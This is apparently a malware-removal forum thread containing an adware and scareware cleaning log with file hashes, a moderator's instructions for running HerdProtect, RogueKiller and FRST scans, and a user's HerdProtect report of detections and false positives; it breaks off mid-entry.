Detection : Scareware:Win32/FakeOptimizer!Ep
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\hxxgudxfntwjwkagqwzaqjjwmihkuszl\slimservicefactory.exe

SlimService.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\hxxgudxfntwjwkagqwzaqjjwmihkuszl\slimservice.exe
MD5 : 4F82DF59A1633847FBF4DA0E91F6027B
Publisher : Slimware Utilities Holdings, Inc.
Size : 4838080
Version : 1.6.0.0
Detection : Scareware:Win32/FakeOptimizer!Ep
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\hxxgudxfntwjwkagqwzaqjjwmihkuszl\slimservice.exe

MyDefragDll.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\hxxgudxfntwjwkagqwzaqjjwmihkuszl\mydefragdll.dll
MD5 : 03C0E90215D3C50324C0B07E3E0F3486
Publisher : Slimware Utilities Holdings, Inc.
Size : 763072
Version : -
Detection : Scareware:Win32/FakeOptimizer!Ep
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\hxxgudxfntwjwkagqwzaqjjwmihkuszl\mydefragdll.dll

Passport_x64.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\{partnerid}\passport_x64.dll
MD5 : 01F02F86CDB2EF6D276E8D56C7363BD3
Publisher : APN LLC
Size : 12688
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\{partnerid}\passport_x64.dll

Passport_x64.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\passport_x64.dll
MD5 : 01F02F86CDB2EF6D276E8D56C7363BD3
Publisher : APN LLC
Size : 12688
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\passport_x64.dll

Passport.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\{partnerid}\passport.dll
MD5 : 723AE5562F48D6F9BDCF93858A4365E7
Publisher : APN LLC
Size : 11152
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\{partnerid}\passport.dll

Passport.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\passport.dll
MD5 : 723AE5562F48D6F9BDCF93858A4365E7
Publisher : APN LLC
Size : 11152
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\passport.dll

TBNotifier.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\updater\tbnotifier.exe
MD5 : 826E44BCA51F86EB1151DA98DD9B3F7A
Publisher : APN LLC
Size : 1719184
Version : 31.26.0.0
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\updater\tbnotifier.exe

TBNotifier.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\updater\tbnotifier.exe
MD5 : 826E44BCA51F86EB1151DA98DD9B3F7A
Publisher : APN LLC
Size : 1719184
Version : 31.26.0.0
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\updater\tbnotifier.exe

tbnhlpr_x64.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\updater\tbnhlpr_x64.exe
MD5 : 12331C6923942D57FD450948B79108E4
Publisher : APN LLC
Size : 193936
Version : 31.26.0.0
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\updater\tbnhlpr_x64.exe

tbnhlpr_x64.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\updater\tbnhlpr_x64.exe
MD5 : 12331C6923942D57FD450948B79108E4
Publisher : APN LLC
Size : 193936
Version : 31.26.0.0
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\updater\tbnhlpr_x64.exe

tbnhlpr.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\updater\tbnhlpr.exe
MD5 : ED8ADF3C806C0BD7B67EAC13B9140B71
Publisher : APN LLC
Size : 168848
Version : 9.9.9.9
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\updater\tbnhlpr.exe

UpdateManager.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\updatemanager.exe
MD5 : F3ADCF9BE54C174140D48F3AF31A9CE4
Publisher : APN LLC
Size : 105360
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\updatemanager.exe

UpdateManager.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\updatemanager.exe
MD5 : F3ADCF9BE54C174140D48F3AF31A9CE4
Publisher : APN LLC
Size : 105360
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\updatemanager.exe

toolbar_x64.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\toolbar_x64.dll
MD5 : DEEF78A38CD47795E5A3B09CC10DBDBF
Publisher : APN LLC
Size : 272272
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\toolbar_x64.dll

ToolbarPS.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\toolbarps.dll
MD5 : D3DB4CF6E89281DC99CAC62DF1167C49
Publisher : APN LLC
Size : 43696
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\toolbarps.dll

Toolbar.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\toolbar.exe
MD5 : 5CD09D605CF3118B9DD8595548289147
Publisher : APN LLC
Size : 391056
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\toolbar.exe

toolbar.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\toolbar.dll
MD5 : 9A92D1C5E0C66AC5C22E7379817D9484
Publisher : APN LLC
Size : 223120
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\toolbar.dll

SO.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\so.dll
MD5 : 8866281CAF26A0D4163560D67CF799B4
Publisher : APN LLC
Size : 678800
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\so.dll

ServiceLocator.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\servicelocator.exe
MD5 : FB004BBFCE284A4A9D8ECDF8344B1363
Publisher : APN LLC
Size : 114576
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\servicelocator.exe

searchhook.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\searchhook.dll
MD5 : 8768DBA0DDB488E79A353F2D2954958E
Publisher : APN LLC
Size : 73616
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\searchhook.dll

apnmcp.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\apnmcp.exe
MD5 : 04EAC92DA235352E94C03921D9A8A014
Publisher : APN LLC
Size : 206224
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\toolbar\apnmcp.exe

APNNativeMsgHost.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\chromeutils\apnnativemsghost.exe
MD5 : BBFE981FC6626B5B5610975EAEE7D218
Publisher : APN LLC
Size : 166800
Version : 2.0.0.3029
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\vdj\source\program files\askpartnernetwork\chromeutils\apnnativemsghost.exe

ServiceLocator.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\servicelocator.exe
MD5 : FB004BBFCE284A4A9D8ECDF8344B1363
Publisher : APN LLC
Size : 114576
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\servicelocator.exe

SO.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\so.dll
MD5 : 8866281CAF26A0D4163560D67CF799B4
Publisher : APN LLC
Size : 678800
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\so.dll

toolbar.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\toolbar.dll
MD5 : 9A92D1C5E0C66AC5C22E7379817D9484
Publisher : APN LLC
Size : 223120
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\toolbar.dll

Toolbar.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\toolbar.exe
MD5 : 5CD09D605CF3118B9DD8595548289147
Publisher : APN LLC
Size : 391056
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\toolbar.exe

ToolbarPS.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\toolbarps.dll
MD5 : D3DB4CF6E89281DC99CAC62DF1167C49
Publisher : APN LLC
Size : 43696
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\toolbarps.dll

toolbar_x64.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\toolbar_x64.dll
MD5 : DEEF78A38CD47795E5A3B09CC10DBDBF
Publisher : APN LLC
Size : 272272
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\toolbar_x64.dll

apnmcp.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\apnmcp.exe
MD5 : 04EAC92DA235352E94C03921D9A8A014
Publisher : APN LLC
Size : 206224
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\apnmcp.exe

searchhook.dll
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\searchhook.dll
MD5 : 8768DBA0DDB488E79A353F2D2954958E
Publisher : APN LLC
Size : 73616
Version : 21.16.0.4618
Detection : PUA:Win32/AskToolbar.Gen
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ovptrrdenagpnmfumbmvqggchmsqpurp\toolbar\searchhook.dll

SWDUMon.sys
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\ewdubisjzmsfhuwxjfayxnnmcmdhosnv\driverupdate\swdumon.sys
MD5 : 04CF20310145DEC63D5387BEAFF77D9A
Publisher : SlimWare Utilities Inc.
Size : 13920
Version : -
Detection : Scareware:Win32/FakeOptimizer!Ep
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\ewdubisjzmsfhuwxjfayxnnmcmdhosnv\driverupdate\swdumon.sys

UninstallStub.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\enrqsnitxssmelwnpsjeedaopbdivhfv\uninstallstub.exe
MD5 : 3BC5EB9D7D4881E8279645366D7369FD
Publisher : Slimware Utilities Holdings, Inc.
Size : 132288
Version : 1.0.0.0
Detection : Scareware:Win32/FakeOptimizer!Ep
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\enrqsnitxssmelwnpsjeedaopbdivhfv\uninstallstub.exe

mdp.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\enrqsnitxssmelwnpsjeedaopbdivhfv\mdp.exe
MD5 : 1FCE8F990DA6D8E11DAF0E4F3FCA6017
Publisher : Slimware Utilities Holdings, Inc.
Size : 246976
Version : 1.1.0.0
Detection : Scareware:Win32/FakeOptimizer!Ep
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\enrqsnitxssmelwnpsjeedaopbdivhfv\mdp.exe

SlimCleanerPlus.exe
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\enrqsnitxssmelwnpsjeedaopbdivhfv\slimcleanerplus.exe
MD5 : B8CEDE54EC96439024153FACC14402C0
Publisher : Slimware Utilities Holdings, Inc.
Size : 26187776
Version : 2.5.8.0
Detection : Scareware:Win32/FakeOptimizer!Ep
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\enrqsnitxssmelwnpsjeedaopbdivhfv\slimcleanerplus.exe

wzenggjnxuqrejynxobcvqgykveymrce.back
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\wzenggjnxuqrejynxobcvqgykveymrce.back
MD5 : 6AF193C544CDF03BD2D2F4A8C45A85E9
Publisher : ytdownloader (Goobzo Ltd)
Size : 23712
Version : 1.0.0.0
Detection : Adware:Win32/Goobzo!Ep
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\wzenggjnxuqrejynxobcvqgykveymrce.back

osaaqvibcgbrvcrnzbdzrvqsasfoqzkn.back
Status : Scanned
Object : %homedrive%\adwcleaner\quarantine\files\osaaqvibcgbrvcrnzbdzrvqsasfoqzkn.back
MD5 : 04CF20310145DEC63D5387BEAFF77D9A
Publisher : SlimWare Utilities Inc.
Size : 13920
Version : -
Detection : Scareware:Win32/FakeOptimizer!Ep
Cleaning Action : Quarantine
Related Objects :
File - %homedrive%\adwcleaner\quarantine\files\osaaqvibcgbrvcrnzbdzrvqsasfoqzkn.back


Cleaning Result
-------------------------------------------------------
Cleaned : 48
Reported as safe : 1
Failed : 0
 

Malnutrition

Malnurished Mod
Moderator
Security Team
Jul 22, 2016
3,395
551
Step 1: Herd Protect Scan.

Scan with HerdProtect

Please download HerdProtect by Reason Software (portable edition) and save the file to your desktop.
Temporary disable your AntiVirus and AntiSpyware protection


  • Right-click on
    icon and select
    Run as Administrator to install the scanner.
  • It will ask for the location - leave the default one (%ProgramFiles%) or select another, convenient one.
  • Agree to the terms, select Launch herdProtect and click Finish.
  • Click Scan. It may take a while, depending on your system and connection specs. Please be patient.
  • When it finishes click on Save Results.
  • A Notepad with a report should open.
Please include the contens of that report in your next reply.
This type of scan often produces false positives. In any case do not remove on your own any of its findings! Removal will be made after the careful analysis of the scan results.
Upon completion of the cleaning you may remove HerdProtect if you wish so. To do it just delete its directory (chosen by you when installing the tool).

Step 2: Rogue Killer Scan.

Download RogueKiller from one of the following links and save it to your Desktop:

Link 1
Link 2
  • Close all the running programs
  • Double click on downloaded setup.exe file to install the program.
  • Click on Start Scan button.
  • Click on another Start Scan button.
  • Wait until the Status box shows Scan Finished
  • Click on Delete.
  • Wait until the Status box shows Deleting Finished.
  • Click on Report and copy/paste the content of the Notepad into your next reply.
  • RKreport.txt could also be found on your desktop.
  • If more than one log is produced post all logs.


Step 3: FRST SCAN

Please download the FRST 32 bit or FRST 64bit version to suit your operating system. It is important FRST is downloaded to your desktop.

If you are unsure if your operating system is 32 or 64 Bit please go HERE.

Once downloaded right click the FRST desktop icon and select "Run as administrator" from the menu"



If you receive any security warnings, or the User Account Control warning opens at any time whilst using FRST you can safely allow FRST to proceed.
FRST will open with two dialogue boxes, accept the disclaimer.


  1. Accept the default whitelist options,
  2. If the additions.txt options box is not checked please select it.
  3. Then select Scan



Frst will take a few minutes to scan your computer, and when finished will produce two log files on your desktop, FRST.txt, and Addition.txt. They will display immediately on the desktop, but can be reopened later as a notepad file.



Please Copy and Paste the contents of these logs in your next post for review
 

Nathan Turnock

PCHF Member
PCHF Member
Dec 11, 2016
6
3
18
Saved date: 12/12/2016 13:48:43
Files detected: 38
Files scanned: 10,886
Processes scanned: 107
Modules scanned: 1,097
ASEPs scanned: 589
Downloads scanned: 9
Deep analysis: 14/0
---------------------------------------------------------------------------------

Files

---------------------------------------------------------------------------------

File path: c:\users\nathan\appdata\local\megasync\shellextx64.dll
Publisher:
MD5: 552eef78ea7a426cd85baa189af3da22
SHA-1: 0d209bd806b6b1f323bad251f83c5c1a96ff2e3c
Created: 01/05/2014 15:13:20
Detections: 1
Determination: UndefinedMalware
- Reason Heuristics as Win.Reputation (M) (Undefined)

---------------------------------------------------------------------------------

File path: c:\program files (x86)\tunnelbear\tbear.maintenance.exe
Publisher:
Signer: TunnelBear, Inc.
MD5: a428f3f1ad0d9db9fe309f90887afc2f
SHA-1: d4ebe0e0de004e61cd8e7c2eb9659c87332e9338
Created: 10/02/2016 12:24:54
Detections: 3
Determination: Adware
- F-Secure as Riskware.Application.Bundler.Firseria (Adware)
- Bkav FE as W32.HfsAdware (Adware)
- Avira AntiVirus as TR/Spy.Gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\windows\runservice.exe
Publisher:
MD5: 29fab5363138f6e322f4cd780ed9d337
SHA-1: a8b494d736c665b463b71c44ca99f248fd938d6d
Created: 26/11/2015 18:10:53
Detections: 1
Determination: Ignore detections (false positive)
- Kingsoft AntiVirus as Win32.Troj.Runservice.(kcloud) (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\nathan\downloads\rsthosts_2.0.exe
Publisher:
MD5: 0a170d9b50b29c5209248d95417c16da
SHA-1: cef50e58f391ac8841f03d4ee73da586a9262dc5
Created: 11/12/2016 17:15:03
Detections: 3
Determination: Inconclusive
- Norman as Autoit.HER (Undefined)
- Jiangmin as Backdoor/Poison.ailg (Undefined)
- Commtouch SDK as W32/GenBl.0A170D9B!Olympus (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\nathan\downloads\spsetup130.exe
Publisher: Piriform Ltd
Signer: Piriform Ltd
MD5: 0942ae8abf027ac095ef3ce2b590448a
SHA-1: c0c6b60703df76c605cdb58d81856475652b08da
Created: 11/12/2016 15:32:37
Detections: 1
Determination: Ignore detections (false positive)
- ESET NOD32 as Win32/Bundled.Toolbar.Google.D potentially unsafe application (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\nathan\appdata\local\temp\jrt\nfo\nircmdc.exe
Publisher: NirSoft
MD5: 2f9c7fda92c346cb5aa32091536ae0cb
SHA-1: a3bbbba563eac751692ba814ada18c3f1c33dd9b
Created: 11/12/2016 17:07:33
Detections: 2
Determination: Ignore detections (false positive)
- The Hacker as Posible_Worm32 (Undefined)
- Sophos as PUA 'NirCmd'

---------------------------------------------------------------------------------

File path: c:\users\nathan\downloads\rsthosts_2.0 (1).exe
Publisher:
MD5: 0a170d9b50b29c5209248d95417c16da
SHA-1: cef50e58f391ac8841f03d4ee73da586a9262dc5
Created: 11/12/2016 17:15:34
Detections: 3
Determination: Inconclusive
- Norman as Autoit.HER (Undefined)
- Jiangmin as Backdoor/Poison.ailg (Undefined)
- Commtouch SDK as W32/GenBl.0A170D9B!Olympus (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\nathan\downloads\setup (2).exe
Publisher: Web Solution Mart
MD5: 44f6181e1ba37963de5005cde897cfb6
SHA-1: 36bdf9d525e3a0c4a0dea4e722ceb5861babe4c2
Created: 20/09/2015 18:37:04
Detections: 2
Determination: Ignore detections (false positive)
- CMC Antivirus as Trojan.Win32.VBKrypt!O (Undefined)
- Quick Heal as (Suspicious) - DNAScan

---------------------------------------------------------------------------------

File path: c:\users\nathan\downloads\spsetup130 (1).exe
Publisher: Piriform Ltd
Signer: Piriform Ltd
MD5: 0942ae8abf027ac095ef3ce2b590448a
SHA-1: c0c6b60703df76c605cdb58d81856475652b08da
Created: 11/12/2016 15:32:38
Detections: 1
Determination: Ignore detections (false positive)
- ESET NOD32 as Win32/Bundled.Toolbar.Google.D potentially unsafe application (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\nathan\downloads\tunnelbear-install (1).exe
Publisher: TunnelBear
Signer: TunnelBear, Inc.
MD5: 2fc8af6534c02f9673e9bbab7ad8b4c3
SHA-1: 8e511c8e6846d7681030dde36000bcf56fed4252
Created: 04/03/2016 22:14:51
Detections: 2
Determination: Ignore detections (false positive)
- Zillya! Antivirus as Adware.MultiPlug.Win32.499178 (Adware)
- Rising Antivirus as PE:Malware.RDM.34!5.28[F1] (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\nathan\downloads\tunnelbear-install.exe
Publisher: TunnelBear
Signer: TunnelBear, Inc.
MD5: 2fc8af6534c02f9673e9bbab7ad8b4c3
SHA-1: 8e511c8e6846d7681030dde36000bcf56fed4252
Created: 04/03/2016 22:14:43
Detections: 2
Determination: Ignore detections (false positive)
- Zillya! Antivirus as Adware.MultiPlug.Win32.499178 (Adware)
- Rising Antivirus as PE:Malware.RDM.34!5.28[F1] (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\nathan\desktop\police\pedsearch.dll
Publisher:
MD5: d4780e04b9a806f617eed3045ca81cfc
SHA-1: 2e0167d356fb43d8342c52291c8c65cfb0e2ae2b
Created: 24/09/2016 11:49:00
Detections: 1
Determination: Inconclusive
- Avira AntiVirus as W32/Ramnit.C (Malware)

---------------------------------------------------------------------------------

File path: c:\windows\rsrcs.dll
Publisher:
MD5: e8085040be21275cf7b1ff1b395bd574
SHA-1: cbaace5f8821dc47890a90fedc49a47352c4a731
Created: 31/12/2015 19:01:12
Detections: 1
Determination: Ignore detections (false positive)
- Qihoo 360 Security as QVM30.1.Malware.Gen (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\blizzard entertainment\battle.net\cache\36\b2\36b27cd911b33c61730a8b82c8b2495fd16e8024fc3b2dde08861c77a852941c.auth
Publisher:
MD5: 140d0aaf310055ebebcdd91d3f0f522e
SHA-1: 8b0b8779b18467e4e180a74971aa469542a18f50
Created: 06/05/2016 17:41:12
Detections: 2
Determination: Ignore detections (false positive)
- Trend Micro House Call as PAK_Generic.001
- Trend Micro as PAK_Generic.001

---------------------------------------------------------------------------------

File path: c:\programdata\intel\package cache\{1ceac85d-2590-4760-800f-8de5e91f3700}\setup.exe
Publisher: Intel Corporation
MD5: 0b5f8bc615fcecc2e87704e6dfecd1cb
SHA-1: 04eab0311b9799c48dbddff00a09332aaa26f75c
Created: 08/09/2015 14:58:59
Detections: 1
Determination: Ignore detections (false positive)
- ByteHero BDV as Trojan-Downloader.win32.Agent.aad (Undefined)

---------------------------------------------------------------------------------

File path: c:\programdata\package cache\{7094abcc-0311-45f4-aaac-638bf633a58a}\tunnelbear-install.exe
Publisher: TunnelBear
Signer: TunnelBear, Inc.
MD5: 08b20c7e3e1d73f3f8655811f4e066ec
SHA-1: 1141baf9b821517e02ba7c0cf71868111f8da81e
Created: 04/03/2016 22:15:36
Detections: 2
Determination: Ignore detections (false positive)
- Zillya! Antivirus as Adware.MultiPlug.Win32.499178 (Adware)
- Rising Antivirus as PE:Malware.RDM.34!5.28[F1] (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\nathan\appdata\local\google\chrome\user data\default\cache\f_0011f0
Publisher: Piriform Ltd
Signer: Piriform Ltd
MD5: 0942ae8abf027ac095ef3ce2b590448a
SHA-1: c0c6b60703df76c605cdb58d81856475652b08da
Created: 11/12/2016 15:32:39
Detections: 1
Determination: Ignore detections (false positive)
- ESET NOD32 as Win32/Bundled.Toolbar.Google.D potentially unsafe application (Undefined)

---------------------------------------------------------------------------------

File path: c:\users\nathan\appdata\local\megasync\libuv.dll
Publisher:
MD5: 1fef5e10819500a6945efddbac2e5647
SHA-1: 689d1cd2c90518f8a2c523700acb2294af68d33a
Created: 28/02/2016 20:48:06
Detections: 1
Determination: Inconclusive
- Avira AntiVirus as W32/Ramnit.C (Malware)

---------------------------------------------------------------------------------

File path: c:\users\nathan\appdata\local\nvidia\nvbackend{abaf8efc}\streamingassets\fallout_4\automated_launch.exe
Publisher:
MD5: f14333f98fd707f70039aa79dcd88b24
